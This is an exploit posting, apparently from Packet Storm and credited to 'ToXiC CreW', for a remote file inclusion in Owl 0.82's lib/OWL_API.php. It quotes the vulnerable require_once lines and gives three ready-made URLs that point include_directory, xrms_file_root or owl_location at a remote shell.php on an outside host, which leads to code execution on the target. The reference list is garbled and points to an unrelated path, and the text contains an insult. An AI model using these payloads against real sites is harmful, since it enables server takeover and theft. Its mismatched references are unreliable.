Owl 0.82 suffers from a remote file inclusion vulnerability.
f9abbf8e402b2c4bf9b444f5d4adbd1d9f8845012f3e2a44a0870512fecbe1fe ###### ToXiC #########################
#
#Owl 0.82 Remote File Inclusion by ToXiC CreW
#
#BuG FounD by Drago84
#
#Application Affect:Owl 0.82
#Page:
# OWL_API.php
#Dir :
# /lib/
#Problem:
# global $owl_location;
# global $xrms_file_root;
# global $include_directory;
# require_once($xrms_file_root . '/include-locations.inc');
# require_once($include_directory . '/adodb/adodb.inc.php');
# require_once($owl_location . '/lib/pclzip/pclzip.lib.php');
# ExPloit :
#[1]http://www.site.com/owl_dir/lib/OWL_API.php?include_directory=[2]h
ttp://marcusbestlamer.gay/shell.php?
#[3]http://www.site.com/owl_dir/lib/OWL_API.php?xrms_file_root=[4]http
://marcusbestlamer.gay/shell.php?
#[5]http://www.site.com/owl_dir/lib/OWL_API.php?[6]owl_location=[7]htt
p://marcusbestlamer.gay/shell.php?
#
#
GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
# ToXic Security Italian CreW
###### ToXiC ##########
References
1. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION
2. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?
3. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION
4. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?
5. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION
6. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION
7. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed